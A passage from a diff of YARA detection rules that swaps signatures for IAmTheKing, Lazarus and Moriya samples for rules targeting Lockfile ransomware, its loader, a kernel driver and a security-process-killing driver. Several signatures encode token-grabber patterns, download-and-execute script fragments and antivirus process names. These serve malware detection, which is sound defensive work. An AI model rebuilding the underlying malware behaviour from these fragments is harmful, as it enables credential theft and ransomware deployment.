00 00 06 7d ?? 00 00 04 06 28 ?? 00 00 0a de 0a 07 2c 06 07 6f ?? 00 00 0a dc de 1a 13 04 72 [2] 00 70 11 04 6f ?? 00 00 0a 28 ?? 00 00 0a 28 ?? 00 00 0a de 00 2a } + $s2 = { 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0a 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0b 02 06 72 [2] 00 70 07 28 ?? 00 00 0a 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0c 02 72 [2] 00 70 02 7b ?? 00 00 04 72 [2] 00 70 08 28 ?? 00 00 0a 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 7b ?? 00 00 04 28 ?? 00 00 0a 1f 16 63 21 00 b0 ca a2 4a 01 00 00 58 0d 09 28 ?? 00 00 0a 13 05 12 05 28 ?? 00 00 0a 13 04 02 12 04 fe 16 ?? 00 00 01 6f ?? 00 00 0a 7d ?? 00 00 04 2a } + $s3 = { 72 [2] 00 70 73 ?? 00 00 0a 0a 06 6f ?? 00 00 0a 6f ?? 00 00 0a 0c 2b 75 08 6f ?? 00 00 0a 74 ?? 00 00 01 0b 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 ?? 19 00 70 6f ?? 00 00 0a 2c 16 02 07 72 ?? 19 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 08 6f ?? 00 00 0a 2d 83 de 0a 08 2c 06 08 6f ?? 00 00 0a dc 2a } + $x1 = "---------------- mercurial grabber ----------------" fullword wide + $x2 = { 5c 00 73 00 2a 00 3a 00 5c 00 73 00 2a 00 28 00 22 00 28 00 3f 00 3a 00 5c 00 5c 00 22 00 7c 00 5b 00 5e 00 22 00 5d 00 29 00 2a 00 3f } + $x3 = { 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 34 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 36 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 37 00 7d 00 01 1d 6d 00 66 00 61 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 38 00 34 00 7d } condition: - uint16(0)==0x5a4d and filesize >35KB and 4 of ($s*) + uint16(0)==0x5a4d and filesize >20KB and 2 of ($x*) and 2 of ($s*) } -rule ARKBIRD_SOLG_MAL_Jackofhearts_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_2 : FILE { meta: - description = "Detect JackOfHearts malware" + description = "Detect EFSPotatoe tool (Generic rule)" author = "Arkbird_SOLG" - id = "42d5eadb-dd94-5a15-8a0d-d1e56b58ce2e" - date = "2021-07-09" - modified = "2021-07-12" - reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_JackOfHearts_Jul_2021_1.yara#L1-L23" + id = "f40673da-7b16-5657-ba9a-f3f13034ad12" + date = "2021-08-27" + modified = "2021-08-29" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_2.yara#L1-L20" license_url = "N/A" - logic_hash = "6cad69beb7c104ef19beb26ca42b923283a0303c230e30b48dde58f88af4cd42" + logic_hash = "eedad68d3192908fea2109c7fa51a2e38e31ed666424307318ac2123b95d1cd3" score = 75 - quality = 73 + quality = 75 tags = "FILE" - hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273" - tlp = "White" - adversary = "IAmTheKing" + hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050" + hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818" + hash3 = "47b85abee8a07e79ad95f48a3e3addf7235144b67b0350e2f9ac80e66f97e583" + hash4 = "7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd" + adversary = "-" strings: - $s1 = "%appdata%" fullword ascii - $s2 = "%temp%" fullword ascii - $s3 = { 43 3a 5c 55 73 65 72 73 5c [2-10] 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c } - $s4 = "CreateServiceA" fullword ascii - $s5 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e } - $s6 = "\\VarFileInfo\\Translation" fullword wide - $s7 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 } - $s8 = "\\SetupUi" fullword wide - $s9 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 } - $s10 = "%s.tmp" fullword wide + $s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 } + $s2 = "ncacn_np" fullword wide + $s3 = { 5c 00 5c 00 25 00 73 00 5c 00 [1-20] 00 5c 00 [1-20] 00 } + $s4 = { 63 00 36 00 38 00 31 00 64 00 34 00 38 00 38 00 2d 00 64 00 38 00 35 00 30 00 2d 00 31 00 31 00 64 00 30 00 2d 00 38 00 63 00 35 00 32 00 2d 00 30 00 30 00 63 00 30 00 34 00 66 00 64 00 39 00 30 00 66 00 37 00 65 } + $s5 = { 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 } condition: - uint16(0)==0x5a4d and filesize >20KB and 7 of ($s*) + uint16(0)==0x5a4d and filesize >10KB and 4 of ($s*) } -rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Lockfile_Packed_Aug_2021_1 : FILE { meta: - description = "Detect PowerPool malware" + description = "Detect lockfile ransomware (Packed version)" author = "Arkbird_SOLG" - id = "8248300e-fc3e-56df-be4a-f1850e2bedc8" - date = "2021-07-09" - modified = "2021-07-12" - reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_1.yara#L1-L29" + id = "7c1631d0-5bec-5b44-b4b2-5ddf1dbd7222" + date = "2021-08-28" + modified = "2021-08-29" + reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Packed_Aug_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "0978a6cd60533ffda0c2b13ea98dc1ba46a464890b895cb2704804a763756fca" - score = 75 - quality = 73 + logic_hash = "a52b2715d505a657c3cd7cd31efb47c16a0ec943a4e1b742bd3ec5c6e46495c9" + score = 50 + quality = 75 tags = "FILE" - hash1 = "9c08136b26ee5234c61a5d9e5a17afb15da35efc66514d2df5b53178693644c5" - hash2 = "23e7e0bbc36d523daa8e3cd8e32618c6c1fb61e32f664756e77d7917b3b11644" - hash3 = "e30d32cc40ad19add7dfdcbed960d5f074ea632b796ae975b75eb25455b66bb0" - hash4 = "88e7813340194acc4b094fd48ecf665a12d19245b90f2a69dab5861982ca95f6" - tlp = "White" - adversary = "IAmTheKing" + hash1 = "2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a" + hash2 = "bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce" + level = "Experimental" + adversary = "Lockfile" strings: - $s1 = "write info fail!!! GetLastError-->%u" fullword ascii - $s2 = "Set Option failed errcode: %ld" fullword ascii - $s3 = { 68 96 00 00 00 68 ?? c4 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 ?? c5 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 [2] 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 [2] fe ff 59 c3 83 3d ?? 4c 45 00 00 74 38 53 6a 01 b8 ?? 4c 45 00 e8 ?? a0 fc ff 50 6a 00 b9 ?? 4c 45 00 e8 [2] fb ff 6a ff bb 01 00 00 00 b8 ?? 4c 45 00 e8 [2] fc ff 40 50 b9 ?? 4c 45 00 e8 [2] fb ff 5b 33 c0 6a ff 50 68 ?? 4c 45 00 } - $s4 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 } - $s5 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 2d 2d 4d 55 4c 54 49 2d 50 41 52 54 53 2d 46 4f 52 4d 2d 44 41 54 41 2d 42 4f 55 4e 44 41 52 59 0d 0a } - $s6 = { 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 0d 0a 0d 0a } - $s7 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a } - $s8 = { 25 73 3b 74 79 70 65 3d 25 73 3b 6c 65 6e 67 74 68 3d 25 73 3b 72 65 61 6c 64 61 74 61 3d 25 73 65 6e 64 } + $s1 = { 90 03 ?? 40 58 4a bc 3c 64 e4 5d 2e 44 45 45 45 ?? 72 48 8e 45 45 43 45 [6] 08 f6 33 45 [5] 01 e9 e3 } + $s2 = { 5b 22 48 0f 5b 22 48 0f 5b 22 48 bb c7 d3 48 03 5b 22 48 bb c7 d1 48 97 5b 22 48 bb c7 d0 48 16 5b 22 48 69 34 df 48 0e 5b 22 48 5d 2e 26 49 1d 5b 22 48 5d 2e 21 49 05 5b 22 48 59 2e 27 49 28 5b 22 48 59 2e 21 49 0e 5b 22 48 5d 2e 27 49 58 5b 22 48 06 23 b1 48 02 5b 22 48 0f 5b 23 48 bf 5b 22 48 59 2e 2b 49 0d 5b 22 48 59 2e dd 48 0e 5b 22 48 59 2e 20 49 0e 5b 22 48 52 69 63 68 0f 5b 22 48 } + $s3 = { 44 fc 90 a9 [0-4] 1c 79 38 10 [0-4] 18 20 72 0e [2-5] 3f [0-4] 24 34 6c 05 fc [0-4] 23 40 } + $s4 = { c3 df [0-4] 10 4c c8 20 d3 55 56 57 41 54 41 55 } condition: - uint16(0)==0x5a4d and filesize >100KB and 6 of ($s*) + uint16(0)==0x5a4d and filesize >10KB and all of ($s*) } -rule ARKBIRD_SOLG_Tool_Screencapture_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Killproc_Aug_2021_1 : FILE { meta: - description = "Detect Screen Capture utility" + description = "Detect KillProc driver used by Night Dragon for kill process before encryption" author = "Arkbird_SOLG" - id = "09e4295e-454a-519a-964e-c5295e603aef" - date = "2021-07-09" - modified = "2021-07-12" - reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/Tool_ScreenCapture_Jul_2021_1.yara#L1-L19" + id = "b0d6a21d-f451-58c9-b640-ad57feec7c38" + date = "2021-08-27" + modified = "2021-08-29" + reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_KillProc_Aug_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "dff6c722ec001f5e3b5c53b41f8d457ab69ae46316f5dc7bbf1d00eb3d1ed3c8" + logic_hash = "d24634e7719e3b6be3322b07c3e754e8c1275c73102c6d7f8d9abaae9887a0da" score = 75 - quality = 73 + quality = 75 tags = "FILE" - hash1 = "f441e6239b592ac15538a8ba8903e5874283b066050a5a7e514ce33e84237f4e" - tlp = "White" - adversary = "IAmTheKing" + hash1 = "36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9" + adversary = "Lockfile" strings: - $s1 = "@MyScreen.jpg" fullword wide - $s2 = "DISPLAY" fullword wide - $s3 = "_invoke_watson" fullword ascii - $s4 = "GdipSaveImageToStream" fullword ascii - $s5 = { 8b 57 04 89 4d e8 8d 4d e8 51 52 e8 16 0c 00 00 85 c0 74 03 89 47 08 8b 75 e8 81 fe 00 04 00 00 77 18 56 e8 ac f9 ff ff 83 c4 04 84 c0 74 0b 8b c6 e8 9e 15 00 00 8b f4 eb 35 83 c8 ff 2b c6 83 f8 08 72 15 8d 46 08 50 ff 15 f4 30 40 00 83 c4 04 85 } + $s1 = "find %s!\n" fullword ascii + $s2 = "killed %s!\n" fullword ascii + $s3 = "DbgPrint" fullword ascii + $s4 = "ntoskrnl.exe" fullword ascii + $s5 = "SBPIMSvc.exe" fullword ascii + $s6 = "MsMpEng.exe" fullword ascii + $s7 = { 48 8b ce ff 15 92 cf ff ff 48 8b d0 48 8b cb ff 15 8e cf ff ff 48 8d 7f 08 85 c0 74 0d 48 8b 1f 44 38 23 75 db e9 a7 00 00 00 48 8b ce ff 15 68 cf ff ff 48 8b d0 48 8d 0d 6e bf ff ff ff 15 70 cf ff ff 48 8b ce ff 15 37 cf ff ff 8b c8 48 8d 54 24 40 ff 15 3a cf ff ff 85 c0 78 56 48 8b 4c 24 40 48 8d 84 24 a8 00 00 00 48 89 44 24 30 45 33 c9 44 88 64 24 28 45 33 c0 33 d2 4c 89 64 24 20 ff 15 04 cf ff ff 85 c0 74 05 45 32 f6 eb 41 48 8b 8c 24 a8 00 00 00 33 d2 ff 15 0b cf ff ff 48 8b 8c 24 a8 00 00 00 ff 15 0d cf ff ff 41 b6 01 eb 05 45 84 f6 74 19 48 8b ce ff 15 da ce ff ff 48 8b d0 48 8d 0d f0 be ff ff ff 15 e2 ce ff ff 48 8b ce ff 15 a1 ce ff ff 48 83 } + $s8 = "UpdaterUI.exe" fullword ascii + $s9 = "VipreNis.exe" fullword ascii condition: - uint16(0)==0x5a4d and ( filesize >8KB and filesize <60KB) and 4 of ($s*) + uint16(0)==0x5a4d and filesize >3KB and 6 of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_APT_Lazarus_EPS_July_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_Loader_Lockfile_Aug_2021_1 : FILE { meta: - description = " Detected Lazarus EPS script for download and execute the payload in base 64" + description = "Detect loader used by lockerfile group" author = "Arkbird_SOLG" - id = "244ef018-bc7b-5e10-bf65-b52fdb5ad403" - date = "2020-07-28" - modified = "2020-07-28" - reference = "https://twitter.com/spider_girl22/status/1287952503280082944" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-28/Lazarus/APT_Lazarus_EPS_July_2020_1.yar#L3-L30" + id = "031335f3-e6c7-5e94-af23-c7fb254203b7" + date = "2021-08-28" + modified = "2021-08-29" + reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_loader_Lockfile_Aug_2021_1.yara#L1-L16" license_url = "N/A" - logic_hash = "0fbd6ac10a31cc9a571e42f8696480336cd350e56ba2ffafb386f066fd53c552" + logic_hash = "622a673d5cb9832cf0abc9942bf0e1f64bcdbd99524dea0bd64698fffa815a9b" score = 75 - quality = 45 + quality = 75 tags = "FILE" - hash1 = "152c620980f0fc20a6eade0f5b726b98fc28392d84ce386a5fc1b0877ef446d7" + hash1 = "ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291" + adversary = "Lockfile" strings: - $s1 = { 63 64 20 2F 64 20 22 25 61 70 70 64 61 74 61 25 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 22 } - $s2 = { 46 75 6E 63 74 69 6F 6E 20 42 61 73 65 36 34 44 65 63 6F 64 65 28 42 79 56 61 6C 20 76 43 6F 64 65 29 } - $s3 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 4D 73 78 6D 6C 32 2E 44 4F 4D 44 6F 63 75 6D 65 6E 74 2E 33 2E 30 22 29 } - $s4 = { 46 75 6E 63 74 69 6F 6E 20 42 69 6E 61 72 79 54 6F 53 74 72 69 6E 67 28 42 69 6E 61 72 79 29 } - $s5 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 41 44 4F 44 42 2E 53 74 72 65 61 6D 22 29 } - $s6 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 57 53 63 72 69 70 74 2E 53 68 65 6C 6C 22 29 } - $s7 = { 63 72 65 61 74 65 6F 62 6A 65 63 74 28 22 4D 69 63 72 6F 73 6F 66 74 2E 58 4D 4C 48 54 54 50 22 29 } - $s8 = { 2E 45 6E 76 69 72 6F 6E 6D 65 6E 74 28 22 50 52 4F 43 45 53 53 22 29 28 22 50 72 6F 67 72 61 6D 57 36 34 33 32 22 29 20 3D 20 22 22 } - $s9 = { 3A 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 53 63 72 69 70 74 69 6E 67 2E 46 69 6C 65 53 79 73 74 65 6D 4F 62 6A 65 63 74 22 29 2E 44 65 6C 65 74 65 66 46 69 6C 65 20 57 73 63 72 69 70 74 2E 53 63 72 69 70 74 46 75 6C 6C 4E 61 6D 65 2C 20 54 72 75 65 3E 22 } - $s10 = { 20 65 63 68 6F 20 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 63 73 63 72 69 70 74 2E 65 78 65 } - $s11 = { 22 5E 26 64 65 6C 20 22 25 7E 66 30 22 3E } - $s12 = { 2E 52 75 6E 20 22 72 65 67 73 76 72 33 32 2E 65 78 65 20 2F 73 20 } - $s13 = { 2E 54 79 70 65 20 3D 20 31 3A 2E 4F 70 65 6E 3A 2E 57 72 69 74 65 20 42 69 6E 61 72 79 3A 2E 50 6F 73 69 74 69 6F 6E 20 3D 20 30 3A 2E 54 79 70 65 20 3D 20 32 3A 2E 43 68 61 72 53 65 74 20 3D 20 22 75 73 2D 61 73 63 69 69 22 } - $s14 = { 2E 4F 70 65 6E 20 22 47 45 54 22 2C 20 } - $s15 = { 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 } - $URL1 = { 22 68 74 74 70 3A 2F 2F 74 ?? ?? ?? } - $URL2 = { 22 68 74 74 70 73 3A 2F 2F 74 ?? ?? ?? } + $s1 = "c:\\windows\\system32\\calc.exe" fullword ascii + $s2 = { 49 48 85 c0 7f ec eb 0a 33 c9 66 89 0c 45 [2] 01 10 68 [2] 00 10 68 [2] 01 10 ff 15 [2] 00 10 6a 00 68 80 00 00 00 6a 03 6a 00 6a 02 68 00 00 00 80 68 [2] 01 10 ff 15 [2] 00 10 83 f8 ff 75 08 6a 00 ff 15 [2] 00 10 50 ff 15 [2] 00 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc } + $s3 = "/proc/123/stat" fullword ascii + $s4 = { 33 c5 89 45 fc a1 [2] 00 10 8b 15 [2] 00 10 8b 0d [2] 00 10 56 89 45 dc 66 a1 [2] 00 10 57 89 55 e4 89 4d e0 8a 0d [2] 00 10 66 89 45 e8 33 c0 8d 55 dc 68 [2] 00 10 52 bf [2] 00 10 88 4d ea 89 45 eb 89 45 ef 89 45 f3 89 45 f7 88 45 fb e8 [2] 00 00 8b f0 83 c4 08 85 f6 74 44 8d 64 24 00 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 29 83 f8 28 75 ed 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 16 0f be 0f 3b c1 75 0f 56 47 e8 [2] 00 00 83 c4 04 83 f8 ff 75 ea 56 e8 [2] 00 00 83 c4 04 6a 00 ff 15 } condition: - uint16(0)==0x33c9 and filesize <3KB and (1 of ($URL*)) and (12 of ($s*)) + uint16(0)==0x5a4d and filesize >10KB and 3 of ($s*) } -rule ARKBIRD_SOLG_MAL_Moriya_May_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Kernel_Driver_Aug_2021_1 : FILE { meta: - description = "Detect Moriya rootkit used in the TunnelSnake operation" + description = "Detect kernel driver used by lockfile group" author = "Arkbird_SOLG" - id = "6a78ddc0-b39f-5aec-9c54-980854173abf" - date = "2020-05-07" - modified = "2021-05-26" - reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_1.yara#L1-L27" + id = "80bf5286-6da6-5380-ad14-345d8122d3d4" + date = "2021-08-28" + modified = "2021-08-29" + reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_Kernel_Driver_Aug_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "f73049f261428c8921a2c8a86fb5d242719e5dc9f30a5c58e86be1a79d84a42d" + logic_hash = "225bd5995d3f1ed4c0bcb43c862662c9e5badd96a87d779d3bc6f1809d0ce3bb" score = 75 - quality = 75 + quality = 50 tags = "FILE" - hash1 = "3eda93de4a1e7a35c040fad914a4885d079ffc3c1362153b74e10ff9121de22b" - hash2 = "d620f9c32adc39b0632f22ec6a0503bf906fd1357f4435463fbb4b422634a536" - tlp = "White" - adversary = "Chinese APT Group" + hash1 = "5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f" + hash2 = "0d18c704049700efd1353055b604072d94bcc3e5f4aa558adf8b8f8848330644" + hash3 = "2b7ffe47b3fabf81a76386ee953d281aeaa158f4926896fcc1425c3844e73597" + hash4 = "61423a95146d5fca47859e43d037944edb32f2004d86e14c7a522270bde6e2a8f" + adversary = "Lockfile" strings: - $seq1 = { 4c 8d 05 13 10 00 00 ff 15 95 12 00 00 48 8d 15 36 10 00 00 48 8d 4d c0 ff 15 fc 12 00 00 48 8d 15 65 10 00 00 48 8d 4d d0 ff 15 eb 12 00 00 48 8d 05 cc 23 00 00 41 b9 22 00 00 00 48 89 44 24 30 4c 8d 45 c0 c6 44 24 28 00 33 d2 83 64 24 20 00 48 8b cb ff 15 f0 11 00 00 33 d2 41 8b ce 8b f8 85 c0 79 09 4c 8d 05 6e } - $seq2 = { 4c 8d 05 85 10 00 00 ff 15 27 12 00 00 48 8b 05 80 23 00 00 48 8d 55 c0 48 8d 4d d0 83 48 30 04 ff 15 be 11 00 00 e8 c5 01 00 00 33 d2 41 8b ce 85 c0 79 0c } - $seq3 = { 33 db 48 8b 74 24 30 4c 8b 7c 24 38 48 8b 7c 24 40 4c 8b 64 24 48 4d 8b ec 48 8d 4c 24 58 ff 15 b7 1c 00 00 48 8b 46 10 49 89 44 24 f8 48 8b 46 08 49 89 45 f0 41 80 65 bb 0f 8a 46 18 24 0f 41 08 45 bb 4c 8b 4e 08 } - $seq4 = { 48 83 64 24 58 00 ba 44 5c 00 00 c7 44 24 50 79 00 00 00 41 b9 76 00 00 00 c7 44 24 48 78 6f 00 00 41 b8 69 72 00 00 c7 44 24 40 72 70 00 00 c7 44 24 38 69 00 00 00 c7 44 24 30 73 6e 00 00 c7 44 24 28 5c 00 00 00 c7 44 24 20 72 65 00 00 e8 03 f6 ff ff 48 8d 55 80 48 8d 4c 24 70 ff 15 74 17 00 00 48 8d 05 2d 28 00 00 45 33 c9 48 89 44 24 38 45 33 c0 48 8b 05 eb 16 00 00 48 83 64 24 30 00 c6 44 24 28 00 41 8d 51 40 48 8b 08 48 89 4c 24 20 48 8d 4c 24 70 ff 15 d9 16 00 00 85 c0 78 31 48 8b 0d ee 27 00 00 48 8b 81 e0 00 00 00 48 89 05 d8 27 00 00 48 8d 05 19 f7 ff ff 87 81 e0 00 00 00 48 8b 0d cc 27 00 00 ff 15 c6 16 00 00 33 c0 48 8b 4d 00 48 33 cc e8 58 0b 00 00 48 81 c4 10 01 00 } - $seq5 = { 40 55 53 56 57 41 56 48 8d ac 24 40 ff ff ff 48 81 ec c0 01 00 00 48 8b 05 47 1e 00 00 48 33 c4 48 89 85 b8 00 00 00 48 83 64 24 38 00 49 8b d8 48 83 64 24 50 00 48 8b fa 48 8b f1 33 d2 41 b8 c8 00 00 00 48 8d 4c 24 60 4d 8b f1 e8 0b 06 00 00 33 c0 48 8d 4d 30 0f 57 c0 48 89 85 b0 00 00 00 33 d2 0f 11 85 90 00 00 00 44 8d 40 58 0f 11 85 a0 00 00 00 e8 e2 05 00 00 0f 10 07 48 83 64 24 20 00 48 8d 05 72 f8 ff ff 48 89 44 24 40 48 8d 54 24 28 48 8d 05 81 fd ff ff 4d 8b c6 48 8b cb 48 89 44 24 48 f3 0f 7f 44 24 28 e8 13 05 00 00 8b d8 85 c0 0f 88 da 00 00 00 0f 10 07 48 8b 0d f7 1f 00 00 48 8d 05 30 0a 00 00 45 33 c9 48 89 45 40 f3 0f 7f 45 30 45 33 c0 48 8d 55 30 0f 10 06 48 89 45 48 f3 0f 7f 45 70 e8 22 05 00 00 8b d8 85 c0 0f 88 93 00 00 00 0f 10 06 83 65 c0 00 48 8d 05 14 0a 00 00 0f 10 0d 5d 0f 00 00 83 a5 a0 00 00 00 00 48 8d 54 24 60 48 8b 0d 9a 1f 00 00 45 33 c9 f3 0f 7f 45 a0 48 89 44 24 70 45 33 c0 0f 10 07 48 89 44 24 78 48 8d 85 90 00 00 00 48 89 45 d8 48 8d 44 24 20 f3 0f 7f 45 e4 c7 45 e0 03 50 00 00 0f 10 05 ff 0e 00 00 c7 45 d0 01 00 00 00 f3 0f 7f 8d 90 00 00 00 c7 85 a8 00 00 00 00 01 00 00 f3 0f 7f 45 b0 48 89 85 b0 00 00 00 e8 91 04 00 00 8b d8 85 c0 79 08 41 8b 0e e8 35 04 00 00 8b c3 48 8b 8d b8 00 00 00 48 33 cc e8 96 02 00 00 48 81 c4 c0 01 00 00 41 5e 5f 5e 5b } - $s1 = "Moriya : NotifyFunction\n" fullword ascii - $s2 = "Moriya Filter" fullword wide - $s3 = "Moriya : DeviceControlDispatch!\n" fullword ascii - $s4 = "Moriya : Waiting...\n" fullword ascii - $s5 = "Moriya : WriteDispatch!\n" fullword ascii - $s6 = { 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e } - $s7 = { 5c 00 44 00 6f 00 73 00 44 00 65 00 76 00 69 00 63 00 65 00 73 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e } - $s8 = "Moriya start\n" fullword ascii + $s1 = "\\BaseNamedObjects\\{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword wide + $s2 = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%ws" fullword wide + $s3 = "\\DosDevices\\%wS" fullword wide + $s4 = "%temp%\\" fullword wide + $s5 = { 5b 2b 5d 20 50 72 6f 63 65 73 73 20 6f 62 6a 65 63 74 20 28 45 50 52 4f 43 45 53 53 29 20 66 6f 75 6e 64 2c 20 30 78 25 6c 6c 58 0d 0a 00 00 00 5b 2b 5d 20 45 50 52 4f 43 45 53 53 2d 3e 50 53 5f 50 52 4f 54 45 43 54 49 4f 4e 2c 20 30 78 25 6c 6c 58 } + $s6 = { 48 8b 4e 20 41 b9 00 08 00 00 4d 8b c7 49 8b d5 41 ff 54 24 70 85 